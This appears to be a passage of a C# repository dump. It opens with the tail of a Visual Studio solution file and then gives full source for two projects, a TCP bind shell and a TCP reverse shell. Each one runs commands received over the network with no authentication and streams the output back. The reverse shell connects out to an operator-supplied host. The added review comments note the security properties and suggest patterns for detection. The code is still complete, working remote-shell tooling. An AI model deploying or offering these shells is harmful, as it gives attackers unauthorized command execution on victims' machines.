77 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|ARM32.ActiveCfg = Debug|ARM32
78 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|ARM32.Build.0 = Debug|ARM32
79 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|ARM64.ActiveCfg = Debug|ARM64
80 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|ARM64.Build.0 = Debug|ARM64
81 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|x64.ActiveCfg = Debug|x64
82 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|x64.Build.0 = Debug|x64
83 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|x86.ActiveCfg = Debug|x86
84 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|x86.Build.0 = Debug|x86
85 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|Any CPU.ActiveCfg = Release|Any CPU
86 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|Any CPU.Build.0 = Release|Any CPU
87 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|ARM32.ActiveCfg = Release|ARM32
88 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|ARM32.Build.0 = Release|ARM32
89 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|ARM64.ActiveCfg = Release|ARM64
90 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|ARM64.Build.0 = Release|ARM64
91 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|x64.ActiveCfg = Release|x64
92 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|x64.Build.0 = Release|x64
93 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|x86.ActiveCfg = Release|x86
94 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|x86.Build.0 = Release|x86
95 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
96 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|Any CPU.Build.0 = Debug|Any CPU
97 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|ARM32.ActiveCfg = Debug|ARM32
98 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|ARM32.Build.0 = Debug|ARM32
99 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|ARM64.ActiveCfg = Debug|ARM64
100 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|ARM64.Build.0 = Debug|ARM64
101 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|x64.ActiveCfg = Debug|x64
102 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|x64.Build.0 = Debug|x64
103 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|x86.ActiveCfg = Debug|x86
104 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|x86.Build.0 = Debug|x86
105 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|Any CPU.ActiveCfg = Release|Any CPU
106 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|Any CPU.Build.0 = Release|Any CPU
107 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|ARM32.ActiveCfg = Release|ARM32
108 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|ARM32.Build.0 = Release|ARM32
109 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|ARM64.ActiveCfg = Release|ARM64
110 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|ARM64.Build.0 = Release|ARM64
111 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|x64.ActiveCfg = Release|x64
112 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|x64.Build.0 = Release|x64
113 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|x86.ActiveCfg = Release|x86
114 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|x86.Build.0 = Release|x86
115 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
116 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|Any CPU.Build.0 = Debug|Any CPU
117 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|ARM32.ActiveCfg = Debug|Any CPU
118 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|ARM32.Build.0 = Debug|Any CPU
119 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|ARM64.ActiveCfg = Debug|Any CPU
120 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|ARM64.Build.0 = Debug|Any CPU
121 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|x64.ActiveCfg = Debug|Any CPU
122 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|x64.Build.0 = Debug|Any CPU
123 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|x86.ActiveCfg = Debug|Any CPU
124 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|x86.Build.0 = Debug|Any CPU
125 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|Any CPU.ActiveCfg = Release|Any CPU
126 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|Any CPU.Build.0 = Release|Any CPU
127 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|ARM32.ActiveCfg = Release|Any CPU
128 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|ARM32.Build.0 = Release|Any CPU
129 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|ARM64.ActiveCfg = Release|Any CPU
130 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|ARM64.Build.0 = Release|Any CPU
131 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|x64.ActiveCfg = Release|Any CPU
132 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|x64.Build.0 = Release|Any CPU
133 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|x86.ActiveCfg = Release|Any CPU
134 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|x86.Build.0 = Release|Any CPU
135 | EndGlobalSection
136 | GlobalSection(SolutionProperties) = preSolution
137 | HideSolutionNode = FALSE
138 | EndGlobalSection
139 | GlobalSection(ExtensibilityGlobals) = postSolution
140 | SolutionGuid = {DDEFD2C2-893D-4A55-B6A1-6FC75809ECC4}
141 | EndGlobalSection
142 | EndGlobal
143 |
--------------------------------------------------------------------------------
/TCP Bind Shell/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Net.Sockets;
4 | using System.IO;
5 | using System.Linq;
6 | using System.Diagnostics;
7 |
// Review note: a TCP listener that runs each line it receives as a process and
// streams that process's output back to the connected client.
// Security properties visible in this code: there is no authentication and no
// transport encryption, so any peer that can reach the port gets command execution
// with the privileges of the account running this process, and all traffic
// (prompt, commands, output) crosses the network in clear text.
// Defensive context: a process that owns a listening socket and spawns child
// processes with redirected standard output/error is a pattern worth alerting on.
class Program {
    // args: either "<port>" alone, or "<host> <port>" (see the parsing below).
    static void Main(string[] args) {
        // With a single argument the listener binds to every local interface.
        IPAddress host = IPAddress.Any;
        int port;
        if (args.Length < 1) {
            throw new ArgumentException("Usage: application [] ");
        }

        // parsing arguments
        if (args.Length == 1) {
            port = Convert.ToInt32(args[0]);
        } else {
            port = Convert.ToInt32(args[1]);
            host = IPAddress.Parse(args[0]);
        }

        // creating the server and listening on the port
        var server = new TcpListener(host, port);
        server.Start();

        // Clients are served one at a time: the next accept happens only after the
        // inner loop for the current client ends.
        while (true) {
            // accepting connection as tcp client
            using (var client = server.AcceptTcpClient()) {
                // get client ip address and port number
                string clientAddr = client.Client.RemoteEndPoint.ToString();

                Console.WriteLine("[+] Client Connected: {0}", clientAddr);

                // get streams
                var stream = client.GetStream();
                var wr = new StreamWriter(stream) { AutoFlush = true };
                var rd = new StreamReader(stream);

                Console.WriteLine("[+] Start Reading Inputs");

                while (true) {
                    // sending the banner and prompt
                    // The prompt sends the local user name and machine name to whoever connected.
                    wr.Write(string.Format("{0}@{1} $ ", Environment.UserName, Environment.MachineName));

                    // skip when input is empty, null or whitespace
                    // exit if cmd is sent to be exit
                    // The whole received line is trimmed and lower-cased before use.
                    var cmd = rd.ReadLine().Trim().ToLower();
                    if (string.IsNullOrEmpty(cmd) || string.IsNullOrWhiteSpace(cmd)) {
                        continue;
                    } else if (cmd == "exit") {
                        break;
                    }

                    // preprocess command line received from client
                    // First space-separated token is the program; the rest is rejoined as its arguments.
                    string[] parts = cmd.Split(' ');
                    string fileName = parts.First();
                    string cmdArgs = string.Join(' ', parts.Skip(1).ToArray());

                    // instantiate process
                    // The program named by the remote peer is started directly, without a shell
                    // (UseShellExecute = false) and with no allow-list or validation.
                    Process process = new Process() {
                        StartInfo = new ProcessStartInfo(fileName, cmdArgs) {
                            UseShellExecute = false,
                            RedirectStandardOutput = true,
                            RedirectStandardError = true
                        }
                    };

                    // spawn process and return output
                    try {
                        process.Start();
                        process.StandardOutput.BaseStream.CopyTo(stream);
                        process.StandardError.BaseStream.CopyTo(stream);
                        process.WaitForExit();
                        Console.WriteLine("[+] Executed '{0}'", cmd);
                    } catch (Exception e) {
                        // The exception text is sent to the client as well as logged locally.
                        wr.WriteLine(e.Message);
                        Console.WriteLine("[x] Failed to Execute '{0}'", cmd);
                    }
                }

                Console.WriteLine("[+] Releasing Resources for {0}", clientAddr);
                // closing other stream
                rd.Close();
                wr.Close();
                stream.Close();
            }
        }
    }
}
92 |
--------------------------------------------------------------------------------
/TCP Bind Shell/TCP Bind Shell.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | TCP_Bind_Shell
7 | AnyCPU;ARM32;ARM64;x64;x86
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/TCP Reverse Shell/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net.Sockets;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Diagnostics;
6 | using System.Text;
7 |
// Review note: a TCP client that connects out to the host and port given on the
// command line, runs each line it receives as a process and streams that process's
// output back over the same connection.
// Security properties visible in this code: the remote end is not authenticated and
// the channel is plain ASCII over TCP, so whoever answers at that address gets
// command execution with the privileges of the account running this process.
// Defensive context: an outbound connection from a process that then spawns child
// processes with redirected standard output/error is a pattern worth alerting on.
class Program {
    // args[0] is the host to connect to and args[1] the port number.
    static void Main(string[] args) {
        if (args.Length < 2) {
            throw new ArgumentException("Usage: executable host-to-connect port-number");
        }

        using (var tcp = new TcpClient()) {
            // connect to the tcp server
            Console.WriteLine("[+] Connecting to tcp://{0}:{1}", args[0], args[1]);
            tcp.Connect(args[0], Convert.ToInt32(args[1]));

            // get tcp stream
            // this is used to send / receive data
            Console.WriteLine("[!] Getting base stream");
            using (var stream = tcp.GetStream()) {
                // specifically getting reader stream
                // this is a higher api encapsulating the low level stream function and provide more functionality
                Console.WriteLine("[!] Creating stream reader from base stream");
                using (var rdr = new StreamReader(stream)) {
                    while (true) {
                        // The prompt sends the local user name and machine name to the remote end.
                        var prompt = Encoding.ASCII.GetBytes(string.Format("{0}@{1} $ ", Environment.UserName, Environment.MachineName));
                        stream.Write(prompt, 0, prompt.Length);

                        // wait for the text from server
                        // The whole received line is trimmed and lower-cased before use.
                        string cmd = rdr.ReadLine().Trim().ToLower();

                        // safeguard user input
                        if (cmd == "exit") {
                            break;
                        } else if (string.IsNullOrEmpty(cmd) || string.IsNullOrWhiteSpace(cmd)) {
                            continue;
                        }

                        // get file name to execute
                        // and its arguments
                        string[] parts = cmd.Split(' ');
                        string fileName = parts.First();
                        string[] fileArgs = parts.Skip(1).ToArray();

                        Console.WriteLine("[+] Executing '{0}'", cmd);

                        // instantiate process
                        // The program named by the remote end is started directly, without a shell
                        // (UseShellExecute = false) and with no allow-list or validation.
                        var process = new Process {
                            StartInfo = new ProcessStartInfo {
                                FileName = fileName,
                                Arguments = string.Join(" ", fileArgs),
                                UseShellExecute = false,
                                RedirectStandardError = true,
                                RedirectStandardOutput = true,

                            }
                        };

                        // start process and handle IO
                        try {
                            process.Start();

                            // copying the stderr and stdout to network stream
                            process.StandardOutput.BaseStream.CopyTo(stream);
                            process.StandardError.BaseStream.CopyTo(stream);

                            process.WaitForExit();
                        } catch (Exception e) {
                            Console.WriteLine("[x] Error executing '{0}'", cmd);
                            // The exception text is sent to the remote end as well as logged locally.
                            var message = Encoding.ASCII.GetBytes(e.Message + "\r\n");
                            stream.Write(message, 0, message.Length);
                        }


                    }

                    // close the reader stream
                    Console.WriteLine("[!] Closing the reader stream");
                    rdr.Close();
                }

                // close the base stream
                Console.WriteLine("[!] Closing the base stream");
                stream.Close();
            }

            // close the tcp connection
            Console.WriteLine("[+] Closing TCP Connection");
            tcp.Close();
        }
    }
}
95 |
--------------------------------------------------------------------------------
/TCP Reverse Shell/TCP Reverse Shell.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | TCP_Reverse_Shell
7 | false
8 | AnyCPU;ARM32;ARM64;x64;x86
9 |
10 |
11 |
12 | Off
13 | false
14 | bin\Debug
15 |
16 |
17 |
18 | bin\Release
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------